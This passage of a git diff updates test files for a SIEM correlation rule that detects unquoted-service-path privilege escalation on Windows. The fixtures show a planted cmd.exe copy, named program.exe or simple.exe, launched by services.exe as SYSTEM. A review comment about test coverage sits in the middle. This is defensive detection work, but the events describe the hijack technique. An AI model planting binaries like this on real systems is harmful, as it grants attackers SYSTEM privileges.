"event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b755-5ea4-0000-0010d06e2500", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": 
"8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "4484", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "596", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:01.724Z", "type": "raw", "uuid": "638719b5-ca45-4a59-bc6e-19e3509127fe"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:00.3084796Z\"},\"EventRecordID\":\"27322\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2752\",\"ThreadID\":\"3576\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:00.127\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b754-5ea4-0000-00104f0a2500}\"},{\"Name\":\"ProcessId\",\"text\":\"6244\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Logon User Interface Host\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"logonui.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"LogonUI.exe\\\" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-3384-5ea5-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=E1AB36E5C3C1453C592E2901330EB13C5D29B351,MD5=33F89DD9629CB0422A2C17268376232D,SHA256=9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071,IMPHASH=B9B0B64B08B38276711093CA94348D39\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"572\"},{\"Name\":\"ParentImage\",\"text\":\"?\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-3384-5ea5-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"LogonUI.exe\" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\logonui.exe", "object.process.guid": "747f3d96-b754-5ea4-0000-00104f0a2500", "object.process.hash.imphash": "B9B0B64B08B38276711093CA94348D39", "object.process.hash.md5": 
"33F89DD9629CB0422A2C17268376232D", "object.process.hash.sha1": "E1AB36E5C3C1453C592E2901330EB13C5D29B351", "object.process.hash.sha256": "9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071", "object.process.id": "6244", "object.process.meta": "Description:Windows Logon User Interface Host | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "logonui.exe", "object.process.original_name": "logonui.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "572", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:00.127Z", "type": "raw", "uuid": "8a10bf4b-66ab-4d06-bb20-2cfbffa251a2"} +{"action": "create", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:18:47.1434753Z\"},\"EventRecordID\":\"27292\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2752\",\"ThreadID\":\"3576\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - Potential PrivEsc via unquoted Service\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:18:47.120\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b521-5ea4-0000-00108c171300}\"},{\"Name\":\"ProcessId\",\"text\":\"5712\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\program.exe\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:18:47.120\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential PrivEsc via unquoted Service", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\program.exe", "object.name": "program.exe", "object.path": "c:\\", "object.property": "creation time", "object.value": 
"2020-04-25T22:18:47.120Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\cmd.exe", "subject.process.guid": "747f3d96-b521-5ea4-0000-00108c171300", "subject.process.id": "5712", "subject.process.name": "cmd.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:18:47.120Z", "type": "raw", "uuid": "f0cf1415-5921-4e9e-a365-bf3ece70afa2"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 { "_rule": "Unquoted_Service_Path_Abuse", "correlation_name": "Unquoted_Service_Path_Abuse", "alert.key": "c:\\program.exe|c:\\program files\\vulnsvc\\mmm.exe"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "c:\\program.exe|c:\\program files\\vulnsvc\\mmm.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Hijack Execution Flow: Path Interception by Unquoted Path", "correlation_name": "Unquoted_Service_Path_Abuse", "correlation_type": "incident", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential Unquoted Service Exploit", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Unquoted_Service_Path_Abuse|c:\\program.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", "object.process.cmdline": "c:\\Program 
Files\\vulnsvc\\mmm.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010e7880100", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "2856", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc index 4066b852..61706d6b 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc 
@@ -1,6 +1,4 @@ -# Здесь укажи какие нормализованные события (одно или несколько) ты подаёшь на вход правилу корреляции. -# События отделяются друг от друга символом новой строки. Каждое их них должно быть записано в строку. -{"_checkpoint": 60837360029, "_meta": {"id": "ecb0611a-0604-01ee-9454-005056825a53", "time": "2023-06-08T14:01:08.9920000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-08T14:01:08.992902900Z\"},\"EventRecordID\":\"50080921\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"292\"},\"Channel\":\"Security\",\"Computer\":\"wks05.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-18\",\"Name\":\"SubjectUserSid\"},{\"text\":\"WKS05$\",\"Name\":\"SubjectUserName\"},{\"text\":\"CYBERDYNE\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x3e7\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0x138c\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\ProgramData\\\\simple.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1936\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x288\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\ProgramData\\\\Simple 
Service\\\\SimpleService.exe\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-16384\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield19": "simple.exe (5004) (file creator: cmd.exe (4916) ← explorer.exe (4244) ← userinit.exe (4228) ← winlogon.exe (632) ← smss.exe (524) ← smss.exe (324)) ← services.exe (648) ← wininit.exe (532) ← smss.exe (420) ← smss.exe (324) ← system (4)", "datafield2": "648", "datafield3": "c:\\windows\\system32\\", "datafield4": "services.exe", "datafield5": "C:\\ProgramData\\Simple Service\\SimpleService.exe", "datafield7": "0", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Operating system", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "S-1-5-18", "object.account.name": "system", "object.account.provider": "local", "object.account.session_id": "999", "object.id": "5004", "object.name": "simple.exe", "object.path": "c:\\programdata\\", "object.process.chain": "simple.exe (file creator: cmd.exe ← 
explorer.exe ← userinit.exe ← winlogon.exe ← smss.exe ← smss.exe) ← services.exe ← wininit.exe ← smss.exe ← smss.exe ← system", "object.process.cmdline": "C:\\ProgramData\\Simple Service\\SimpleService.exe", "object.process.fullpath": "c:\\programdata\\simple.exe", "object.process.id": "5004", "object.process.name": "simple.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\", "object.type": "elevated", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "2.3.4.5", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "S-1-5-18", "subject.account.name": "system", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.domain": "cyberdyne", "subject.id": "S-1-5-18", "subject.name": "wks05$", "subject.privileges": "%%1936", "subject.state": "on behalf of oneself", "tag": "wineventlog", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-08T14:01:08.9920000Z", "uuid": "ecb0611a-0604-01ee-9454-005056825a53"} +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Security-Auditing\", 
\"Guid\": \"{54849625-5478-4994-a5ba-3e3b0328c30d}\" }, \"EventID\": \"4688\", \"Version\": \"2\", \"Level\": \"0\", \"Task\": \"13312\", \"Opcode\": \"0\", \"Keywords\": \"0x8020000000000000\", \"TimeCreated\": { \"SystemTime\": \"2023-06-08T14:37:10.335665700Z\" }, \"EventRecordID\": \"50082171\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"4\", \"ThreadID\": \"2684\" }, \"Channel\": \"Security\", \"Computer\": \"wks05.example.com\", \"Security\": null }, \"EventData\": { \"Data\": [ { \"text\": \"S-1-5-18\", \"Name\": \"SubjectUserSid\" }, { \"text\": \"WKS05$\", \"Name\": \"SubjectUserName\" }, { \"text\": \"CYBERDYNE\", \"Name\": \"SubjectDomainName\" }, { \"text\": \"0x3e7\", \"Name\": \"SubjectLogonId\" }, { \"text\": \"0x1648\", \"Name\": \"NewProcessId\" }, { \"text\": \"C:\\\\ProgramData\\\\Simple Service\\\\simple.exe\", \"Name\": \"NewProcessName\" }, { \"text\": \"%%1936\", \"Name\": \"TokenElevationType\" }, { \"text\": \"0x288\", \"Name\": \"ProcessId\" }, { \"text\": \"\\\"C:\\\\ProgramData\\\\Simple Service\\\\Simple\\\" Service.exe\", \"Name\": \"CommandLine\" }, { \"text\": \"S-1-0-0\", \"Name\": \"TargetUserSid\" }, { \"text\": \"-\", \"Name\": \"TargetUserName\" }, { \"text\": \"-\", \"Name\": \"TargetDomainName\" }, { \"text\": \"0x0\", \"Name\": \"TargetLogonId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\services.exe\", \"Name\": \"ParentProcessName\" }, { \"text\": \"S-1-16-16384\", \"Name\": \"MandatoryLabel\" } ] } } }", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": 
"info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "cyberdyne", "object.account.id": "S-1-5-18", "object.account.name": "wks05$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "object.process.fullpath": "c:\\programdata\\simple service\\simple.exe", "object.process.id": "5704", "object.process.name": "simple.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\simple service\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T08:36:02.469Z", "status": "success", "subject": "account", "subject.account.domain": "cyberdyne", "subject.account.id": "S-1-5-18", "subject.account.name": "wks05$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-08T14:37:10.335Z", "type": "raw", "uuid": "d4a01206-bc5a-4dd4-824b-0cb47d1a2fbf"} # Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"alert.key": "c:\\programdata\\simple.exe|c:\\programdata\\simple service\\simpleservice.exe", "correlation_name": "Unquoted_Service_Path_Abuse"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "c:\\programdata\\simple service\\simple.exe|\"c:\\programdata\\simple service\\simple\" service.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Hijack Execution Flow: Path Interception by Unquoted Path", "correlation_name": "Unquoted_Service_Path_Abuse", "correlation_type": "incident", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Unquoted_Service_Path_Abuse|c:\\programdata\\simple service\\simple.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "cyberdyne", "object.account.id": "S-1-5-18", "object.account.name": "wks05$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "object.process.fullpath": "c:\\programdata\\simple service\\simple.exe", "object.process.id": "5704", "object.process.name": "simple.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\simple service\\", "status": "success", "subject": "account", "subject.account.domain": "cyberdyne", "subject.account.id": "S-1-5-18", "subject.account.name": "wks05$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999"} \ No newline at end of file 
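Review bot: The new input at the `+{"action": "start"` line switches this test to the second-space variant (`"C:\ProgramData\Simple Service\Simple" Service.exe` resolved to `simple.exe` inside `Simple Service\`), but the comment that explained this variant in test_3 (`#случай, когда в пути к сервису несколько пробелов и хакеры используют не первый`) was not carried over, so the file no longer states which case of the rule it covers; add a line before the event such as `# Service path with several spaces; the hijacking binary sits at the second space (Simple Service\simple.exe), not at C:\ProgramData\simple.exe`. The removed input's case — interception at the first space inside a non-root directory (`c:\programdata\simple.exe|c:\programdata\simple service\simpleservice.exe`) — appears to be covered by no remaining test in this patch, since test_1 and test_3 both exercise `c:\program.exe`, so it seems worth keeping as an additional test rather than dropping. Both this file and test_3 still end with `\ No newline at end of file`.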
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc
index 49e00215..002c29c4 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc
@@ -1,4 +1,3 @@ -{"_checkpoint": 60843328089, "_meta": {"id": "041a90cf-0606-01ee-9454-005056825a53", "time": "2023-06-08T14:08:57.6580000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-08T14:08:57.662941300Z\"},\"EventRecordID\":\"833155\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2336\",\"ThreadID\":\"3744\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-08 14:08:57.658\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-e0f9-6481-3701-000000003b00}\",\"Name\":\"ProcessGuid\"},{\"text\":\"4556\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\ProgramData\\\\Simple Service\\\\simple.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.1697 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Windows Command Processor\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"Cmd.Exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"\\\"C:\\\\ProgramData\\\\Simple Service\\\\Simple\\\" Service.exe\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT 
AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-dbde-6481-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"0\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-dbdd-6481-0b00-000000003b00}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"648\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "Cmd.Exe", "datafield19": "simple.exe (4556) (file creator: cmd.exe (4916) ← explorer.exe (4244) ← userinit.exe (4228) ← winlogon.exe (632) ← smss.exe (524) ← smss.exe (324)) ← services.exe (648) ← wininit.exe (532) ← smss.exe (420) ← smss.exe (324) ← system (4)", "datafield2": "648", "datafield3": "c:\\windows\\system32\\", "datafield4": "services.exe", "datafield5": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "datafield6": "20fff121-dbde-6481-e703-000000000000", "datafield7": "999", "datafield8": "20fff121-e0f9-6481-3701-000000003b00", "datafield9": "C:\\Windows\\system32\\services.exe", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": 
